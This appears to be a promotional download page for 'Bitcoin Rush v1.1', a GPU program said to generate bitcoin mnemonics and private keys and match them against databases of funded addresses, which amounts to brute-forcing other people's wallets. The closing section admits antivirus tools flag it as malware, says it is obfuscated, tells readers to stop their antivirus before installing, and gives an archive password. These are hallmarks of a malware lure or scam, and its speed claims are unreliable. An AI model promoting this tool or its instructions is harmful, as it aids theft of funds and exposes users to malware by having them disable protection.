This program can generate all the well-known types of bitcoin addresses (starting on 1, bc1q - Legacy, Segwit), according to the most common path of derivation BIP 32, BIP 44, BIP 84 using the GPU and checks them with the available addresses from database of bitcoins with balances. The program due to the calculation at the GPU has a very high speed, exceeds the CPU Generator at 100-1000x, the search takes milliseconds. screen screen This is amazing speed vs CPU type generators, them get only 100-5000 mnemonics per second.
screen Just look to this picture - this is very small range from 1 to 2^132 then range for legacy btc addresses 1 to 2^256. And also important - when we searching mnemonic we find master key for all next addresses by this mnemonic words, when we searching privkey in HEX we find only one address!
The Programm Bitcoin Rush v 1.1 supported most types path of desktop and mobile wallets as Trust wallet, Exodus wallet, etc. Ledger and Trezor which using 12 words without passphrase.
We can add the functions and tools you need (other derivation paths, different coins BCH, ETH, Doge, Litecoin etc.). You will be provided with up-to-date address databases.
Bitcoin Rush v1.1
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Bitcoin Rush v1.1 are often recognized as or confused with malware by antivirus services due to the way these programs interact with system processes, memory and the operating system itself. Bitcoin Rush v1.1 may also use some form of obfuscation to circumvent anti-cheat detection or prevent others from reverse engineering the author's work.
All files are manually analyzed and approved by certified staff members.
STOP or pause your anti-virus software before installing.
Arhive pass:123
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